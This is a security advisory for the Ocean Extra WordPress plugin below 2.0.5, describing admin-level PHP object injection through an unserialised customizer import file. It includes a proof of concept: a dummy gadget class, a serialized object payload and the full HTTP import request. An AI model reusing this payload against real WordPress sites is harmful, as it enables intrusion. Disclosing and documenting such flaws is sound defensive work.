Ocean Extra < 2.0.5 - Admin+ PHP Objection Injection

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.

PoC

To simulate a gadget chain, put the following code in a plugin class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Create a file named import.dat with the following content: O:4:“Evil”:0:{}; Import the file via the “Import Customizer Styling” feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active) The view the response of the import request made, which will have the “Arbitrary deserialization” message POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1 Accept: / Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022 Content-Length: 542 Connection: close Cookie: [admin+] -----------------------------371888087213614698033751989022 Content-Disposition: form-data; name=“file”; filename=“localhost-wordpress-oceanwp-export.dat” Content-Type: application/octet-stream O:4:“Evil”:0:{}; -----------------------------371888087213614698033751989022 Content-Disposition: form-data; name=“action” oceanwp_cp_customizer_import -----------------------------371888087213614698033751989022 Content-Disposition: form-data; name=“_nonce” 166c9022e0 -----------------------------371888087213614698033751989022–